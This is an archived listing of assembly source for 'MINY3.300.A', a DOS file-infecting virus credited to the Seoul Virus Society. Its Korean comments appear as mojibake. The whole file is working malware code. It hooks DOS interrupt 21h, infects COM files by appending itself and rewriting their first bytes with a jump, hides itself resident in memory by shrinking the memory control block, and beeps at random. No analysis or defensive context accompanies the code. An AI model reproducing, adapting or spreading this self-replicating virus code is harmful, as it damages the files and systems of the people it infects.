home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KOREACOL.ZIP / MINY.ZIP / MINY3.ZIP / MY3-300.ASM < prev    next >
Assembly Source File  |  1996-08-12  |  6KB  |  213 lines
  1. ;******************************************************************************
  2. ;
  3. ;         MINY3.300.A Virus
  4. ;
  5. ;     ╣A╕b: ¼ß╢ë ña╖í£ß»a ╡e╨s          ╣A╕b: 1995æe 01╢⌐ 24╖⌐ - 1╢⌐ 26╖⌐
  6. ;           Seoul Virus Society
  7. ;
  8. ;******************************************************************************
  9.  
  10.  
  11.      VIRUS SEGMENT PARA 'VIRUS'
  12.               ASSUME CS:VIRUS, DS:VIRUS
  13.  
  14.  PARASIZE      EQU     (TEnv_Virus - Entry + 0Fh) SHR 4 ; £æ╡A¼ß └a╗í╨aôe ╟aïí
  15.  
  16.  Entry:
  17.           mov     BP,100h                    ; BP=ña╖í£ß»a »í╕b ║ü¡íêt
  18.           JMP     ChkVirinMEM                ; £æ ¼w║ü ╠a╦a¥í ╕±╧a
  19.  
  20.  NewInt21:       ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ߣ≤╦a
  21.           PushF
  22.           xchg   ah,al
  23.           cmp    al,4Bh                      ; »⌐╨ù╖Ñêa?
  24.           jnz    ChkAHF0
  25.           call   PushRES                     ; ╠a╖⌐ êq╡q ╤í┬ë
  26.  ChkAHF0:
  27.           cmp    AL,0F0h                     ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa?
  28.           jnz    OrgInt21
  29.           cmp    ah,31h
  30.           jnz    OrgInt21
  31.           PopF
  32.           xor    ax,ax                       ; áx╖aíe 0000╖i ò⌐¥a║æ
  33.           IRET
  34.  OrgInt21:                                   ; ╢Ñ£ü int 21¥í ╕±╧a
  35.           xchg    ah,al
  36.           PopF
  37.           db      0EAh
  38.  OldInt21 dd ?
  39.  
  40.  PushRES:
  41.           Push    ax                         ; ¥A╗í»a╚ß ╕ß╕w
  42.           Push    bx
  43.           Push    cx
  44.           Push    dx
  45.           Push    ds
  46.           Push    ES
  47.           Push    si
  48.  
  49.           MOV     AX,4301h                   ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ
  50.           xor     cx,cx
  51.           int     21h
  52.           jnc     Open_File
  53.           JMP     PopRES
  54.  Open_File:
  55.           mov     ax,3D02h                   ; ╠a╖⌐ ╡í╧e ╨aïí
  56.           Int     21h
  57.           jc      PopRES
  58.  
  59.           push    cs
  60.           pop     ds
  61.           xchg    bx,ax                      ; ╨àùi ┤Φïí
  62.  
  63.  Read_File:
  64.           mov     ah,3Fh                     ; ╖¬┤ß ùi╖íïí
  65.           mov     dx,offset Org4bytes
  66.           mov     si,dx
  67.           mov     cx,0004h
  68.           int     21h
  69.  
  70.  ChkEXEFile:
  71.           cmp     byte ptr ds:[SI],'M'       ; EXE ╠a╖⌐ ╖Ñêa?
  72.           jz      Close_File
  73.  
  74.  Infect_COM:
  75.           cmp     byte ptr DS:[SI+3],43h     ; êq╡q ╡aªü ╤┬╖Ñ
  76.           jz      Close_File
  77.  
  78.           mov     al,02h                     ; ╠a╖⌐╖ü ╣A╖⌐ ûߥí
  79.           call    AH42h
  80.  
  81.           cmp     ax,1234                    ; 1234 Ñíöa ╕b╖eêa?
  82.           jb      Close_File
  83.           cmp     ax,65000                   ; 65000 Ñíöa ╟eêa?
  84.           ja      Close_File
  85.  
  86.           Push    AX
  87.           add     AX,0100h
  88.           mov     word ptr DS:[Entry+1],ax   ; ña╖í£ß»a »í╕b╢ß├í
  89.           Pop     AX
  90.           sub     ax,0003                    ; JMP íw¥w ╣í╕b
  91.           mov     word ptr ds:[FileHead+1],ax
  92.           mov     byte ptr ds:[FileHead+3],43h
  93.  
  94.           mov     ah,40h                     ; ña╖í£ß»a │aïí
  95.           xor     dx,dx
  96.           mov     cx, offset End_Virus
  97.           Int     21h
  98.  
  99.           mov     al,00h                     ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖
  100.           call    AH42h
  101.  
  102.           mov     ah,40h                     ; ña╖í£ß»a │aïí
  103.           mov     dx, offset FileHead
  104.           mov     cx,0004h
  105.           Int     21h
  106.  
  107.  Close_File:                                 ; ╠a╖⌐ öhïí
  108.           mov     ah,3eh
  109.           Int     21h
  110.  
  111.           xor     ax,ax                      ; Ée«ü ñi¼ù
  112.           mov     ds,ax
  113.           mov     al,byte ptr DS:[046Ch]
  114.           and     al,07h                     ; 1/8 ╤┬ƒI
  115.           cmp     al,07
  116.           jnz     PopRES
  117.           mov     ah,2                       ; '½ó' ¡íƒíƒi Éàöa.
  118.           mov     dl,07
  119.           Int     21h
  120.  PopRES:
  121.           Pop     si
  122.           Pop     ES
  123.           Pop     ds
  124.           Pop     dx
  125.           Pop     cx
  126.           Pop     bx
  127.           Pop     ax
  128.           RET
  129.  
  130.  ChkVirinMEM:
  131.           mov     AH,31h                     ; AX=F031h/Int 21h»í
  132.           mov     AL,0F0h                    ; AX=0 ╖ííe £æ╡A ña╖í£ß»a ╖╢╖q
  133.           xchg    ah,al
  134.           Int     21h                        ;
  135.           or      ax,ax                      ;
  136.           jz      Already_MEM                ;
  137.  
  138.           xor     bx,bx                      ; BX=0000
  139.           mov     ds,bx                      ; 0000:0084h Ñó¼a
  140.           mov     si,0083h
  141.           lea     DI,SS:[BP+OldInt21]
  142.           Inc     SI
  143.           cld
  144.           movsw
  145.           movsw
  146.  
  147.           Push    cs
  148.           Push    cs
  149.           Pop     ds
  150.           Pop     ax
  151.           mov     CX, PARASIZE               ;└a╗í╨i £æ ╟aïí
  152.           dec     ax
  153.           mov     ds,ax
  154.           Inc     BL                         ; BX=0001
  155.           cmp     byte ptr DS:[BX-1],'Z'     ;
  156.           jnz     Already_MEM
  157.  
  158.           mov     al,'S'                     ; SVS ╡A¼ß ╣A╕b╨ûöaëí ┤q»í
  159.           sub     word ptr DS:[BX+02],CX     ;
  160.           mov     al,'V'
  161.           sub     word ptr DS:[BX+11h],CX    ;
  162.           mov     al,'S'
  163.           mov     ES,word ptr DS:[BX+11h]    ;
  164.  
  165.           Push    cs
  166.           Pop     ds
  167.  
  168.           mov     si,BP
  169.           xor     di,di
  170.           mov     cx, offset TEnd_Virus
  171.           repz    movsb
  172.  
  173.           mov     ds,cx                      ; Int 21h ƒi └a╗í╨eöa.
  174.           cli
  175.           mov     word ptr ds:[BX+85h],es
  176.           mov     word ptr ds:[BX+83h],offset NewInt21
  177.           sti
  178.  
  179.  Already_Mem:
  180.           mov     si,BP
  181.  
  182.           push    cs
  183.           pop     ds
  184.           push    cs                         ; ds=es
  185.           pop     es
  186.  
  187.  Re_COM:          ; COM ╠a╖⌐ »⌐╨ù╨aïí
  188.           add     si,offset Org4bytes        ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí
  189.           mov     di,00FFh
  190.           Inc     di                         ; └ß╖q╖ü 4 ña╖í╦a Ñóèü
  191.           push    di
  192.           movsw
  193.           movsw
  194.           RET
  195.  
  196.  Org4bytes       db 90h,90h,0cdh,20h         ; ╢Ñ£ü 4 ña╖í╦a╖ü êt
  197.  
  198.  Ah42h:
  199.           mov     ah,42h
  200.           xor     cx,cx
  201.           xor     dx,dx
  202.           Int     21h
  203.           RET
  204.           db      'Miny3'
  205.  
  206.  FileHead db     0E9h
  207.  End_VIRUS:
  208.           db  ?,?,?
  209.  TEnd_VIRUS:
  210.  
  211.    virus  ends
  212.     end Entry
  213.